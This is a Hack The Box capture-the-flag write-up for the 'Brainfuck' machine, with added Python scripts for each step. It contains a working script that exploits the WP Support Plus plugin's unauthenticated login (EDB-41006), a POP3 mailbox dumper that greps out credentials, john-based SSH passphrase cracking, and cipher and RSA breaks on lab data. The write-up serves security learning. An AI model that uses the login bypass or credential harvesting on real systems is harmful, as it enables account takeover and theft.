HTB - Brainfuck

Raj Singh
5 min read · Sep 30, 2019

Machine IP: 10.10.10.17

Nmap

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES TOP SASL(PLAIN) USER AUTH-RESP-CODE CAPA PIPELINING UIDL
143/tcp open imap Dovecot imapd
|_imap-capabilities: more IMAP4rev1 have post-login ENABLE ID OK SASL-IR listed LITERAL+ AUTH=PLAINA0001 LOGIN-REFERRALS capabilities Pre-login IDLE
443/tcp open ssl/http nginx 1.10.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Issuer: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-04-13T11:19:29
| Not valid after: 2027-04-11T11:19:29
| MD5: cbf1 6899 96aa f7a0 0565 0fc0 9491 7f20
|_SHA-1: f448 e798 a817 5580 879c 8fb8 ef0e 2d3d c656 cb66
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1

The certificate's Subject and Subject Alternative Name fields give three hostnames. nginx selects the virtual host from the Host header, so they need to go in /etc/hosts before browsing:

  • brainfuck.htb
  • sup3rs3cr3t.brainfuck.htb
  • www.brainfuck.htb

Browsing to https://10.10.10.17 by IP shows only the default "Welcome to nginx!" page. With the names mapped, https://brainfuck.htb serves a WordPress site instead.

I then ran wpscan against it, enumerating all plugins and skipping certificate validation because the certificate is self-signed:

wpscan -e ap --disable-tls-checks --url https://brainfuck.htb

wpscan flagged an outdated plugin, WP Support Plus Responsive Ticket System 7.1.3.

searchsploit has a matching entry, exploits/php/webapps/41006.txt (EDB-41006: WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation). The plugin's loginGuestFacebook AJAX action sets WordPress's login cookies for whatever username is POSTed to wp-admin/admin-ajax.php, without checking a password.

The exploit is a plain HTML form that POSTs to the target's wp-admin/admin-ajax.php. I saved it locally as login.html, changed the action URL to https://brainfuck.htb/wp-admin/admin-ajax.php and the username to administrator, served it with python3 -m http.server 80, and submitted it from the browser so that the auth cookie the target sets lands in the browser's cookie store.

Back at https://brainfuck.htb the site showed me logged in as administrator, but that account had nothing useful. I edited login.html again, changed the username from administrator to admin, and resubmitted. (wpscan -e u enumerates the site's usernames and saves this guessing.)
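The same rogue login, done from a script instead of a browser form, as an added example that is not part of the original write-up or of EDB-41006. It uses only the standard library; the field names (username, email, action=loginGuestFacebook) follow the HTML form in EDB-41006, the e-mail value is an arbitrary placeholder, and the success check relies on WordPress naming its session cookie wordpress_logged_in_<hash>. Certificate verification is off by default because the lab certificate is self-signed.

```python
"""Unauthenticated WordPress login through WP Support Plus's loginGuestFacebook
action (mechanism from EDB-41006).
Usage: python3 wp_guest_login.py https://brainfuck.htb admin
"""
import ssl
import sys
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

AJAX_PATH = "/wp-admin/admin-ajax.php"


def build_login_request(base_url, username):
    """(url, form body) for the rogue login. The plugin trusts the posted
    username and sets WordPress's login cookies for that account without
    ever seeing a password."""
    url = base_url.rstrip("/") + AJAX_PATH
    body = urllib.parse.urlencode({
        "username": username,
        "email": "x@example.com",        # must be present, is not validated (placeholder)
        "action": "loginGuestFacebook",
    }).encode()
    return url, body


def has_auth_cookie(cookie_names):
    """WordPress names its session cookie wordpress_logged_in_<md5 of siteurl>,
    so success is any cookie with that prefix, whatever the hash."""
    return any(name.startswith("wordpress_logged_in_") for name in cookie_names)


def login(base_url, username, verify_tls=False):
    """POST the form and return (cookie jar filled by the target, opener)."""
    url, body = build_login_request(base_url, username)
    ctx = ssl.create_default_context()
    if not verify_tls:                    # lab certificate is self-signed
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    jar = CookieJar()
    opener = urllib.request.build_opener(
        urllib.request.HTTPSHandler(context=ctx),
        urllib.request.HTTPCookieProcessor(jar),
    )
    opener.open(url, data=body, timeout=10).read()
    return jar, opener


if __name__ == "__main__":
    base, user = sys.argv[1], sys.argv[2]
    jar, opener = login(base, user)
    if has_auth_cookie(c.name for c in jar):
        resp = opener.open(base.rstrip("/") + "/wp-admin/", timeout=10)
        print(f"logged in as {user}; /wp-admin/ returned HTTP {resp.status}")
    else:
        print("no auth cookie set: user may not exist or the plugin is patched")
```

Because the target only checks that the username exists, the script reports failure for a non-existent account (no wordpress_logged_in_ cookie comes back), which is the quickest way to tell "wrong username" from "plugin patched" without a browser.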

That worked: I was now logged in as admin. The WordPress dashboard lists the installed plugins, among them Easy WP SMTP. Its settings page holds the SMTP credentials for the user orestis; the password box is masked in the browser, but the value is sent in the HTML, so intercepting the response (or simply viewing the page source) shows the SMTP password in plaintext.

POP3 (110) is open, so the next step is to read that user's mail with the SMTP password.

I talked POP3 by hand (nc 10.10.10.17 110, then USER orestis, PASS with the SMTP password, LIST to see the messages, and TOP 2 514 to dump the first 514 lines of message 2). That message carries a second set of credentials:

username: orestis
password: kIEnnfEKJ#9UmdO
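The same mailbox walk as a script, added here as an example and not part of the original write-up. It logs in with poplib, pulls every message in full with RETR (TOP can truncate), and greps each one for username/password lines. The sample mail embedded in the block is constructed for the offline demo; only the two credential lines come from the write-up. Host, user and password are command-line arguments.

```python
"""Dump a POP3 mailbox and pick out credential lines.
Usage: python3 pop3_dump.py 10.10.10.17 orestis '<smtp password>'
(with no arguments it runs on the constructed sample mail below)
"""
import poplib
import re
import sys

# Lines like "username: x", "login = y", "password: z" (case-insensitive).
CRED_RE = re.compile(r"^\s*(user(?:name)?|login|pass(?:word)?)\s*[:=]\s*(\S+)",
                     re.IGNORECASE | re.MULTILINE)

# Constructed sample in the shape of the forum mail; headers are made up,
# the two credential lines are the ones the write-up found.
SAMPLE_MAIL = """\
From: root@brainfuck.htb
To: orestis@brainfuck.htb
Subject: Forum Access Details

Hi there, your credentials for our "secret" forum are below

username: orestis
password: kIEnnfEKJ#9UmdO
"""


def extract_credentials(text):
    """First username-like and first password-like value in a message."""
    found = {}
    for field, value in CRED_RE.findall(text):
        key = "password" if field.lower().startswith("pass") else "username"
        found.setdefault(key, value)
    return found


def fetch_messages(host, user, password, port=110):
    """Log in and return every message as text. Uses RETR, so nothing is
    cut off, and never sends DELE, so the mailbox is left untouched."""
    box = poplib.POP3(host, port, timeout=15)
    try:
        box.user(user)
        box.pass_(password)
        count, _size = box.stat()
        messages = []
        for i in range(1, count + 1):
            _resp, lines, _octets = box.retr(i)
            messages.append(b"\n".join(lines).decode("utf-8", "replace"))
        return messages
    finally:
        box.quit()


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(extract_credentials(SAMPLE_MAIL))      # offline demo
        sys.exit(0)
    for n, msg in enumerate(fetch_messages(*sys.argv[1:4]), 1):
        creds = extract_credentials(msg)
        print(f"--- message {n} ---\n{msg}\n=> {creds or 'no credential lines'}")
```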

The mail says these credentials are for the "secret" forum, so I logged in at https://sup3rs3cr3t.brainfuck.htb/ as orestis. There the admin is sharing SSH access keys, in an encrypted way.

In the "SSH Access" discussion the admin says orestis's SSH key will be shared, and in the "Key" discussion the whole exchange between admin and orestis is encrypted. The admin's last reply looks like an encrypted URL.

Digging into it, the thread is encrypted with a Vigenère cipher: each letter is shifted by the corresponding letter of a repeating key, and spaces and punctuation pass through unchanged. That is breakable with known plaintext, and the forum hands it over: orestis signs his readable posts "Orestis - Hacking for fun and profit", and his signature in the encrypted thread lines up with it letter for letter:

Pieagnm - Jkoijeg nbw zwx mle grwsnn
Orestis - Hacking for fun and profit

Subtracting the plaintext from the ciphertext letter by letter, ignoring the non-letters, gives the key stream. After some searching I found a site that does this and got:

brainfuckmybrainfuckmybrainfu

"fuckmybrain" repeats inside it, so that is the key; the stream starts part-way through it only because the signature sits mid-message. Decrypting the admin's last reply with that key gives the URL:

mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr
https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
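The known-plaintext attack carried out in code rather than on a website, as an added example that is not part of the original write-up. The three strings are the ones quoted above; everything else (the key recovery, the period search, the rotation loop that fixes the key's phase by looking for an "https://" prefix) is this example's own. The rotation step is the part worth seeing: the signature sits mid-message, so the stream recovered from it is a rotation of the real key, and the right phase for the URL is whichever one decrypts to a URL.

```python
"""Known-plaintext break of the forum's Vigenere cipher, then decryption of
the admin's URL. Usage: python3 vig_crack.py
"""
import string

ALPHA = string.ascii_lowercase

# Strings from the write-up: orestis's signature in clear and as it appears in
# the encrypted thread, and the admin's encrypted URL.
KNOWN_PLAINTEXT = "Orestis - Hacking for fun and profit"
KNOWN_CIPHERTEXT = "Pieagnm - Jkoijeg nbw zwx mle grwsnn"
CIPHER_URL = "mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr"


def recover_keystream(ciphertext, plaintext):
    """Key letter at each letter position: k = (c - p) mod 26. Non-letters are
    skipped because the cipher passes them through unchanged."""
    cs = [ch.lower() for ch in ciphertext if ch.isalpha()]
    ps = [ch.lower() for ch in plaintext if ch.isalpha()]
    if len(cs) != len(ps):
        raise ValueError("plaintext and ciphertext letter counts differ")
    return "".join(ALPHA[(ALPHA.index(c) - ALPHA.index(p)) % 26]
                   for c, p in zip(cs, ps))


def shortest_period(stream):
    """Smallest unit whose repetition reproduces the whole key stream."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def vigenere(text, key, decrypt=True):
    """Shift letters by the key, advancing the key only on letters; case and
    punctuation are preserved, which is how the forum text behaves."""
    out, i = [], 0
    for ch in text:
        if not ch.isalpha():
            out.append(ch)
            continue
        k = ALPHA.index(key[i % len(key)].lower())
        base = ord("A") if ch.isupper() else ord("a")
        out.append(chr((ord(ch) - base + (-k if decrypt else k)) % 26 + base))
        i += 1
    return "".join(out)


def crack_url(cipher_url, key_unit, prefix="https://"):
    """The known plaintext sat mid-message, so the recovered unit is some
    rotation of the real key. Try each rotation; keep the one yielding a URL."""
    for r in range(len(key_unit)):
        key = key_unit[r:] + key_unit[:r]
        pt = vigenere(cipher_url, key)
        if pt.startswith(prefix):
            return key, pt
    raise ValueError("no rotation of the key produced the expected prefix")


if __name__ == "__main__":
    stream = recover_keystream(KNOWN_CIPHERTEXT, KNOWN_PLAINTEXT)
    unit = shortest_period(stream)
    key, url = crack_url(CIPHER_URL, unit)
    print(f"key stream: {stream}\nperiod    : {unit}\nkey       : {key}\nurl       : {url}")
```

The same functions decrypt the rest of the thread: pass any encrypted post and the recovered key to vigenere(), keeping in mind that the key phase for a given post depends on where the post starts, not on where the signature was.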

Fetching that URL gives orestis's private key, id_rsa, but it is passphrase-protected: ssh -i id_rsa prompts for a passphrase. So I converted the key to a john hash with ssh2john.py and cracked it against rockyou:

ssh2john.py id_rsa > id_rsa_1
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_1

john found the passphrase:

3poulakia! (id_rsa)

After chmod 600 id_rsa, logging in with ssh -i id_rsa orestis@10.10.10.17 and that passphrase gives a shell as orestis and user.txt.

In orestis's home directory there is also a script, encrypt.sage, next to two files it wrote, debug.txt and output.txt. Reading it: the script loads the contents of /root/root.txt as an integer m, generates an RSA key (two random primes p and q, n = p*q, and a random public exponent e coprime to (p-1)(q-1)), computes the ciphertext c = m^e mod n, writes c to output.txt, and for "debugging" writes p, q and e to debug.txt. Leaking the primes defeats the scheme entirely: with p and q known, the private exponent is d = e^-1 mod (p-1)(q-1), computed with the extended Euclidean algorithm, and m = c^d mod n.

Searching for a ready-made decryptor I found rsa_egcd.py on GitHub, which takes p, q, e and ct. ct is the number in output.txt, and p, q and e are the three values in debug.txt, pasted in that order.

Running it returns m; converting that integer back to hex and then to ASCII gives the root flag.
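The decryption written out, as an added example that is not the rsa_egcd.py script from GitHub nor anything from the write-up. It assumes the file layouts described above (debug.txt holds p, q and e one per line; output.txt holds the ciphertext as the last integer on its line) and that m was built from the flag's bytes big-endian, which is what the hex conversion in encrypt.sage amounts to. The test values are the small textbook RSA example (p=61, q=53, e=17, m=65, c=2790), not anything from the box.

```python
"""Recover the plaintext encrypted by encrypt.sage when p, q and e leaked.
Usage: python3 rsa_leaked_primes.py debug.txt output.txt
"""
import re
import sys


def parse_ints(text):
    """Every decimal integer in the text, in order of appearance."""
    return [int(tok) for tok in re.findall(r"\d+", text)]


def modinv(a, m):
    """a^-1 mod m via the iterative extended Euclidean algorithm (iterative on
    purpose: a recursive egcd can exceed Python's recursion limit on
    1024-bit moduli)."""
    old_r, r = a % m, m
    old_s, s = 1, 0
    while r:
        quot = old_r // r
        old_r, r = r, old_r - quot * r
        old_s, s = s, old_s - quot * s
    if old_r != 1:
        raise ValueError("e is not invertible modulo phi(n)")
    return old_s % m


def rsa_decrypt(p, q, e, ct):
    """Textbook RSA with the factors in hand: d = e^-1 mod (p-1)(q-1),
    m = ct^d mod pq."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = modinv(e, phi)
    return pow(ct, d, n)


def int_to_text(m):
    """encrypt.sage built m from the hex of the file's bytes, so the reverse
    is big-endian integer -> bytes -> str."""
    return m.to_bytes((m.bit_length() + 7) // 8, "big").decode("utf-8", "replace")


def recover_flag(debug_txt, output_txt):
    """debug.txt: p, q, e one per line (assumed layout);
    output.txt: ciphertext as the last integer on the line (assumed layout)."""
    p, q, e = parse_ints(debug_txt)[:3]
    ct = parse_ints(output_txt)[-1]
    return int_to_text(rsa_decrypt(p, q, e, ct))


if __name__ == "__main__":
    with open(sys.argv[1]) as dbg, open(sys.argv[2]) as out:
        print(recover_flag(dbg.read(), out.read()))
```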

BRAINFUCKED - NO MERCY

THANK YOU
